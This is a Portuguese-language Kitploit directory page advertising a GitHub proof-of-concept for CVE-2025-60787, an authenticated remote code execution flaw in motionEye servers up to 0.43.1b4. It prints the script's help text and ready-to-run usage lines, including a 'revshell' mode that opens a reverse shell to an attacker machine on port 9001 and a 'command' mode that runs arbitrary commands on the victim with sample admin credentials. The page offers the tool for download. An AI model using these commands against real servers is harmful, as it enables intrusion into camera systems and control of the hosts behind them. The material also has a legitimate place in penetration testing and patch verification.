Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-60787 — PoC automatizado para CVE-2025-60787 fornecendo execução remota de código autenticada contra servidores motionEye até 0.43.1b4, com modos de shell reverso e execução de comandos. | Kitploit
Ferramentas/GitHubGitHub/gunzf0x/cve-2025-60787
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingFerramenta de Acesso Remoto
GitHubgunzf0x/cve-2025-60787

CVE-2025-60787

PoC automatizado para CVE-2025-60787 fornecendo execução remota de código autenticada contra servidores motionEye até 0.43.1b4, com modos de shell reverso e execução de comandos.

Ver Repositório
10122há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-60787 - RCE Autenticado em motionEye

PoC para CVE-2025-60787 que é uma vulnerabilidade de RCE autenticado para motionEye em todas as versões afetadas até 0.43.1b4 (inclusive).

Este é um PoC automatizado para a vulnerabilidade descrita em este repositório. Créditos a prabhatverma47.

Uso

O script tem 2 comandos que exploram a vulnerabilidade. Um que envia diretamente uma reverse shell chamado revshell e outro comando chamado command para executar diretamente comandos abusando desta CVE.

❯ python3 CVE-2025-60787.py -h

usage: CVE-2025-60787.py [-h] {revshell,command} ...

PoC for CVE-2025-60787 -- Authenticated RCE in motionEye by gunzf0x

positional arguments:
  {revshell,command}  Choose between send a reverse shell or (attempting to) run commands
    revshell          Attempt to send a reverse shell using CVE-2025-60787 vuln
    command           Execute a command remotely using CVE-2025-60787 vuln

options:
  -h, --help          show this help message and exit

Reverse Shell

Use o comando revshell para obter uma shell. Por exemplo:

python3 CVE-2025-60787.py revshell --url 'http://10.10.10.10:8765' --user 'admin' --password 'StrongPassw0rd123!' -i 10.10.10.15 --port 9001

Onde 10.10.10.10 é a máquina alvo (máquina executando motionEye), 10.10.10.15 é a nossa máquina atacante e 9001 é a porta na qual estamos ouvindo para capturar uma reverse shell.

Execução de Comandos

Se, em vez de uma reverse shell, quisermos executar outros comandos remotamente, podemos usar a opção command. Por exemplo, execute o comando ping -c1 10.10.10.15 na máquina vítima:

python3 CVE-2025-60787.py command --url 'http://10.10.10.10:8765' --user 'admin' --password 'StrongPassw0rd123!' -e 'ping -c1 10.10.10.15'

Onde 10.10.10.10 é a máquina executando motionEye.

Aviso Legal

Use este script sempre por sua própria conta e risco.

Seja ético (:

Baixar ferramenta